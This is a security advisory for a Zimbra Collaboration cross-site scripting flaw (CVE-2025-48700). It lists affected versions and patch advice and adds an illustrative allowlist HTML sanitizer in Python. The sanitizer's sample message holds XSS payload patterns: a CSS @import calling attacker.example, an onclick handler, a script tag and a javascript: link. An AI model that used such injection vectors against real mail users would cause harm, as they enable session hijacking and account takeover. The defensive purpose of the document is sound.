PT-2025-26606 · Zimbra · Zimbra Collaboration

Published: 2025-06-23 · Updated: 2026-05-19 · CVE-2025-48700

CVSS v2.0: 6.4 (Medium)
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:N
Name of the Vulnerable Software and Affected Versions

- Zimbra Collaboration (ZCS) version 8.8.15
- Zimbra Collaboration (ZCS) version 9.0
- Zimbra Collaboration (ZCS) version 10.0
- Zimbra Collaboration (ZCS) version 10.1
Description

A Cross-Site Scripting (XSS) vulnerability exists in the Zimbra Classic UI because HTML content in messages is insufficiently sanitized. An attacker can execute arbitrary JavaScript within a user's session using crafted tag structures and attribute values that contain a CSS @import directive, as well as other script injection vectors. The issue is triggered as soon as the user views a specially crafted email message; no further user interaction is required. Successful exploitation can lead to unauthorized access to sensitive information or full takeover of the email account. Over 10,500 servers worldwide have been identified as unpatched, and the issue is being actively exploited in the wild, with some incidents involving network-wide pivoting after the initial compromise.
Recommendations

- Update Zimbra Collaboration (ZCS) version 8.8.15 to the June 2025 patched version.
- Update Zimbra Collaboration (ZCS) version 9.0 to the June 2025 patched version.
- Update Zimbra Collaboration (ZCS) version 10.0 to the June 2025 patched version.
- Update Zimbra Collaboration (ZCS) version 10.1 to the June 2025 patched version.
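The root cause named above is sanitization of email HTML that lets attribute values carrying a CSS @import directive (and other script vectors such as event handlers and javascript: URLs) reach the rendering UI. The following allowlist-based sanitizer is an added illustration of the defensive pattern, not Zimbra's code or a reconstruction of its fix: it keeps only known-safe elements and attributes, drops inline style attributes outright (reporting separately when one carries @import, url() or expression()), drops on* handlers and non-allowlisted URL schemes, and discards script and style elements together with their contents. The tag and attribute allowlists, the URL scheme list and the sample message are all assumptions constructed for the example.

```python
"""Allowlist HTML sanitizer for email bodies (added example; not Zimbra's code)."""
import html
import re
from html.parser import HTMLParser

# Assumed policy: a small allowlist is safer than trying to enumerate bad constructs.
ALLOWED_TAGS = {"p", "br", "b", "i", "u", "em", "strong", "a", "div", "span",
                "ul", "ol", "li", "table", "tr", "td", "th", "img"}
ALLOWED_ATTRS = {"a": {"href", "title"}, "img": {"src", "alt", "width", "height"},
                 "td": {"colspan", "rowspan"}, "th": {"colspan", "rowspan"}}
VOID_TAGS = {"br", "img"}
SAFE_URL = re.compile(r"^(https?:|mailto:|cid:)", re.IGNORECASE)
# CSS constructs that must never reach the renderer from an untrusted message.
CSS_VECTOR = re.compile(r"@\s*import|url\s*\(|expression\s*\(", re.IGNORECASE)


class EmailSanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.dropped = []      # (tag, attribute or None, reason) for triage/logging
        self._skip_depth = 0   # >0 while inside <script>/<style>: text is discarded too

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self._skip_depth += 1
            self.dropped.append((tag, None, "disallowed element"))
            return
        if self._skip_depth:
            return
        if tag not in ALLOWED_TAGS:
            self.dropped.append((tag, None, "not in allowlist"))
            return  # unknown element is removed; its text content is still emitted
        kept = []
        for name, value in attrs:
            value = value or ""
            reason = self._reject_reason(tag, name, value)
            if reason:
                self.dropped.append((tag, name, reason))
            else:
                kept.append(f' {name}="{html.escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    @staticmethod
    def _reject_reason(tag, name, value):
        name = name.lower()
        if name.startswith("on"):
            return "event handler"
        if name == "style":
            # Inline style is dropped regardless; the reason records whether the
            # attribute carried the @import/url()/expression() vector.
            if CSS_VECTOR.search(value):
                return "inline style with @import/url()/expression()"
            return "inline style not allowed"
        if name not in ALLOWED_ATTRS.get(tag, set()):
            return "not in allowlist"
        if name in ("href", "src") and not SAFE_URL.match(value.strip()):
            return "unsafe URL scheme"
        return None

    def handle_endtag(self, tag):
        if tag in ("script", "style"):
            self._skip_depth = max(0, self._skip_depth - 1)
            return
        if self._skip_depth or tag not in ALLOWED_TAGS or tag in VOID_TAGS:
            return
        self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self._skip_depth:
            self.out.append(html.escape(data, quote=False))


def sanitize_email_html(raw):
    """Return (clean_html, dropped) where dropped lists every rejected construct."""
    parser = EmailSanitizer()
    parser.feed(raw)
    parser.close()
    return "".join(parser.out), parser.dropped


# Constructed sample message body exercising each vector named in the advisory.
SAMPLE = ('<div style="@import url(http://attacker.example/x.css)">'
          '<p onclick="alert(1)">Hi <b>there</b></p>'
          '<script>alert(1)</script>'
          '<a href="javascript:alert(1)">x</a>'
          '<img src="cid:logo"></div>')

if __name__ == "__main__":
    clean, dropped = sanitize_email_html(SAMPLE)
    print(clean)
    for item in dropped:
        print("dropped:", item)
```

The `dropped` list is what a mail gateway or SOC would log: a message whose inline style is rejected specifically for an @import vector is a strong triage signal, while ordinary styled newsletters only produce the generic "inline style not allowed" reason.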

Fix

XSS


Weakness Enumeration

Related Identifiers

BDU:2025-12729
CVE-2025-48700

Affected Products

Zimbra Collaboration